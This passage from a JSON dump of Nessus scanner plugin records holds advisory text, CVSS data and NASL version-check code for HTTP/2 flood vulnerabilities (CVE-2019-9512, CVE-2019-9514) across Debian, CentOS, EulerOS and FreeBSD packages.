2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"golang-go.net-dev\", reference:\"1:0.0+git20161013.8b4af36+dfsg-3+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"golang-golang-x-net-dev\", reference:\"1:0.0+git20161013.8b4af36+dfsg-3+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-02-11T14:21:52", "description": "The remote CentOS Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the CESA-2019:4273 advisory.\n\n - HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512)\n\n - HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-01-29T00:00:00", "type": "nessus", "title": "CentOS 8 : container-tools:1.0 (CESA-2019:4273)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9512", "CVE-2019-9514"], "modified": "2023-02-08T00:00:00", "cpe": ["p-cpe:2.3:a:centos:centos:runc:*:*:*:*:*:*:*", "cpe:2.3:o:centos:centos:8:*:*:*:*:*:*:*", "p-cpe:2.3:a:centos:centos:buildah:*:*:*:*:*:*:*", "p-cpe:2.3:a:centos:centos:container-selinux:*:*:*:*:*:*:*", "p-cpe:2.3:a:centos:centos:containernetworking-plugins:*:*:*:*:*:*:*", "p-cpe:2.3:a:centos:centos:containers-common:*:*:*:*:*:*:*", "p-cpe:2.3:a:centos:centos:fuse-overlayfs:*:*:*:*:*:*:*", "p-cpe:2.3:a:centos:centos:oci-systemd-hook:*:*:*:*:*:*:*", "p-cpe:2.3:a:centos:centos:oci-umount:*:*:*:*:*:*:*", "p-cpe:2.3:a:centos:centos:podman:*:*:*:*:*:*:*", "p-cpe:2.3:a:centos:centos:podman-docker:*:*:*:*:*:*:*", "p-cpe:2.3:a:centos:centos:skopeo:*:*:*:*:*:*:*", "p-cpe:2.3:a:centos:centos:slirp4netns:*:*:*:*:*:*:*"], "id": "CENTOS8_RHSA-2019-4273.NASL", "href": "https://www.tenable.com/plugins/nessus/145582", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# Red Hat Security Advisory RHSA-2019:4273. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145582);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/08\");\n\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"RHSA\", value:\"2019:4273\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"CentOS 8 : container-tools:1.0 (CESA-2019:4273)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nCESA-2019:4273 advisory.\n\n - HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512)\n\n - HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:4273\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9514\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:buildah\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:container-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:containernetworking-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:containers-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:fuse-overlayfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:oci-systemd-hook\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:oci-umount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:podman\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:podman-docker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:runc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:skopeo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:slirp4netns\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/CentOS/release');\nif (isnull(os_release) || 'CentOS' >!< os_release) audit(AUDIT_OS_NOT, 'CentOS');\nvar os_ver = pregmatch(pattern: \"CentOS(?: Stream)?(?: Linux)? release ([0-9]+)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif ('CentOS Stream' >< os_release) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS Stream ' + os_ver);\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\nvar module_ver = get_kb_item('Host/RedHat/appstream/container-tools');\nif (isnull(module_ver)) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module container-tools:1.0');\nif ('1.0' >!< module_ver) audit(AUDIT_PACKAGE_NOT_AFFECTED, 'Module container-tools:' + module_ver);\n\nvar appstreams = {\n 'container-tools:1.0': [\n {'reference':'buildah-1.5-6.gite94b4f9.module_el8.1.0+299+10c6b3e0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'buildah-1.5-6.gite94b4f9.module_el8.1.0+299+10c6b3e0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'container-selinux-2.94-1.git1e99f1d.module_el8.1.0+236+34fc7673', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'container-selinux-2.94-1.git1e99f1d.module_el8.1.0+236+34fc7673', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'containernetworking-plugins-0.7.4-4.git9ebe139.module_el8.1.0+299+10c6b3e0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'containernetworking-plugins-0.7.4-4.git9ebe139.module_el8.1.0+299+10c6b3e0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'containers-common-0.1.32-6.git1715c90.module_el8.1.0+299+10c6b3e0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'containers-common-0.1.32-6.git1715c90.module_el8.1.0+299+10c6b3e0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'fuse-overlayfs-0.3-5.module_el8.1.0+236+34fc7673', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'fuse-overlayfs-0.3-5.module_el8.1.0+236+34fc7673', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'oci-systemd-hook-0.1.15-2.git2d0b8a3.module_el8.1.0+237+63e26edc', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'oci-systemd-hook-0.1.15-2.git2d0b8a3.module_el8.1.0+237+63e26edc', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'oci-umount-2.3.4-2.git87f9237.module_el8.1.0+237+63e26edc', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'oci-umount-2.3.4-2.git87f9237.module_el8.1.0+237+63e26edc', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'podman-1.0.0-4.git921f98f.module_el8.1.0+299+10c6b3e0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'podman-1.0.0-4.git921f98f.module_el8.1.0+299+10c6b3e0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'podman-docker-1.0.0-4.git921f98f.module_el8.1.0+299+10c6b3e0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'podman-docker-1.0.0-4.git921f98f.module_el8.1.0+299+10c6b3e0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'runc-1.0.0-56.rc5.dev.git2abd837.module_el8.1.0+299+10c6b3e0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'runc-1.0.0-56.rc5.dev.git2abd837.module_el8.1.0+299+10c6b3e0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'skopeo-0.1.32-6.git1715c90.module_el8.1.0+299+10c6b3e0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'skopeo-0.1.32-6.git1715c90.module_el8.1.0+299+10c6b3e0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'slirp4netns-0.1-3.dev.gitc4e1bc5.module_el8.1.0+236+34fc7673', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'slirp4netns-0.1-3.dev.gitc4e1bc5.module_el8.1.0+236+34fc7673', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n};\n\nvar flag = 0;\nappstreams_found = 0;\nforeach module (keys(appstreams)) {\n var appstream = NULL;\n var appstream_name = NULL;\n var appstream_version = NULL;\n var appstream_split = split(module, sep:':', keep:FALSE);\n if (!empty_or_null(appstream_split)) {\n appstream_name = appstream_split[0];\n appstream_version = appstream_split[1];\n if (!empty_or_null(appstream_name)) appstream = get_one_kb_item('Host/RedHat/appstream/' + appstream_name);\n }\n if (!empty_or_null(appstream) && appstream_version == appstream || appstream_name == 'all') {\n appstreams_found++;\n foreach package_array ( appstreams[module] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'CentOS-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && _release) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n }\n}\n\nif (!appstreams_found) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module container-tools:1.0');\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'buildah / container-selinux / containernetworking-plugins / etc');\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T15:26:28", "description": "According to the versions of the golang packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - Some HTTP/2 implementations are vulnerable to ping floods, potentially leading to a denial of service. The attacker sends continual pings to an HTTP/2 peer, causing the peer to build an internal queue of responses. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both.(CVE-2019-9512)\n\n - Some HTTP/2 implementations are vulnerable to a reset flood, potentially leading to a denial of service. The attacker opens a number of streams and sends an invalid request over each stream that should solicit a stream of RST_STREAM frames from the peer. Depending on how the peer queues the RST_STREAM frames, this can consume excess memory, CPU, or both.(CVE-2019-9514)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-09-23T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP5 : golang (EulerOS-SA-2019-1967)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:golang", "p-cpe:/a:huawei:euleros:golang-bin", "p-cpe:/a:huawei:euleros:golang-src", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-1967.NASL", "href": "https://www.tenable.com/plugins/nessus/129124", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(129124);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"EulerOS 2.0 SP5 : golang (EulerOS-SA-2019-1967)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the golang packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - Some HTTP/2 implementations are vulnerable to ping\n floods, potentially leading to a denial of service. The\n attacker sends continual pings to an HTTP/2 peer,\n causing the peer to build an internal queue of\n responses. Depending on how efficiently this data is\n queued, this can consume excess CPU, memory, or\n both.(CVE-2019-9512)\n\n - Some HTTP/2 implementations are vulnerable to a reset\n flood, potentially leading to a denial of service. The\n attacker opens a number of streams and sends an invalid\n request over each stream that should solicit a stream\n of RST_STREAM frames from the peer. Depending on how\n the peer queues the RST_STREAM frames, this can consume\n excess memory, CPU, or both.(CVE-2019-9514)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1967\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c0413d68\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected golang packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:golang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:golang-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:golang-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"golang-1.12-5.eulerosv2r7\",\n \"golang-bin-1.12-5.eulerosv2r7\",\n \"golang-src-1.12-5.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"golang\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T15:23:40", "description": "The traefik project reports :\n\nUpdate of dependency to go go1.12.8 resolves potential HTTP/2 denial of service in traefik.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-08-20T00:00:00", "type": "nessus", "title": "FreeBSD : traefik -- Denial of service in HTTP/2 (41f4baac-bf77-11e9-8d2f-5404a68ad561) (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:traefik", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_41F4BAACBF7711E98D2F5404A68AD561.NASL", "href": "https://www.tenable.com/plugins/nessus/127947", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2022 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(127947);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"FreeBSD : traefik -- Denial of service in HTTP/2 (41f4baac-bf77-11e9-8d2f-5404a68ad561) (Ping Flood) (Reset Flood)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The traefik project reports :\n\nUpdate of dependency to go go1.12.8 resolves potential HTTP/2 denial\nof service in traefik.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://github.com/containous/traefik/releases/tag/v1.7.14\"\n );\n # https://vuxml.freebsd.org/freebsd/41f4baac-bf77-11e9-8d2f-5404a68ad561.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3d5b50cf\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:traefik\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This 